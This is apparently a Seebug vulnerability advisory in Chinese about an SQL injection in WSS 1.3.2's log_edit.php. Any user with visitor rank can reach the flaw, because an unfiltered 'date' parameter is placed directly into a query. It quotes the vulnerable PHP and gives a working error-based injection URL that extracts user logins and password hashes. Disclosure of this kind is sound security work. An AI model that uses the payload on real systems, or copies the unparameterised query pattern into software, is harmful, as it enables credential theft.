WSS最新版某处SQL注入直接获取数据四

2014-11-24T00:00:00
ID SSV:95821
Type seebug
Reporter Root
Modified 2014-11-24T00:00:00

Description

简要描述:

WSS最新版多处SQL注入直接获取数据四,访客即可注入拿数据

详细说明:

WSS最新正式版1.3.2,某处SQL注入直接获取数据,访客权限即可注入拿数据 首先介绍下WSS的用户角色:

管理员MM_rank=5 项目经理MM_rank=4 普通用户MM_rank=3 访客MM_rank=2 只读MM_rank=1

在WSS系统里面部分文件和功能判断了MM_rank值,即权限问题 也有部分文件和功能没有权限判断和限制,前面的两个漏洞都是没有权限限制的 这里我们要讲的漏洞是MM_rank大于等于2的用户就能注入,访客即可 文件log_edit.php

<?php require_once('config/tank_config.php'); ?> <?php require_once('session.php'); ?> <?php $restrictGoTo = "user_error3.php"; if ($_SESSION['MM_rank'] < "2") { header("Location: ". $restrictGoTo); exit; } $logdate = $_GET['date']; $taskid = $_GET['taskid']; $nowuser = $_SESSION['MM_uid']; $self_url = "http://".$_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF']; $self = substr($self_url , strrpos($self_url , '/') + 1); $host_url=str_replace($self,'',$self_url); ...... mysql_select_db($database_tankdb, $tankdb); $query_log = sprintf("SELECT *, tk_user1.uid as uid1, tk_user2.tk_display_name as tk_display_name2 FROM tk_task_byday inner join tk_task on tk_task_byday.csa_tb_backup1=tk_task.TID inner join tk_user as tk_user2 on tk_task_byday.csa_tb_backup2=tk_user2.uid inner join tk_user as tk_user1 on tk_task.csa_from_user=tk_user1.uid WHERE csa_tb_year=$logdate AND csa_tb_backup1= %s ", GetSQLValueString($taskid, "text")); $log = mysql_query($query_log, $tankdb) or die(mysql_error()); $row_log = mysql_fetch_assoc($log); $totalRows_log = mysql_num_rows($log);

注意这里的$logdate = $_GET['date'],没有任何过滤 然后进入$query_log变量时,也就是这里要执行的sql语句时,没有使用GetSQLValueString函数处理,也没有单引号保护,直接进入sql语句,导致sql注入

漏洞证明:

http://localhost/wss/log_edit.php?date=1%20and%201=2%20union%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(select%20concat(0x23,tk_user_login,0x23,tk_user_pass)%20from%20tk_user%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)%23&taskid=1

注入结果证明

<img src="https://images.seebug.org/upload/201411/212221417a07c840e9e7e2b842c6e467b69934f1.png" alt="1.png" width="600" onerror="javascript:errimg(this);">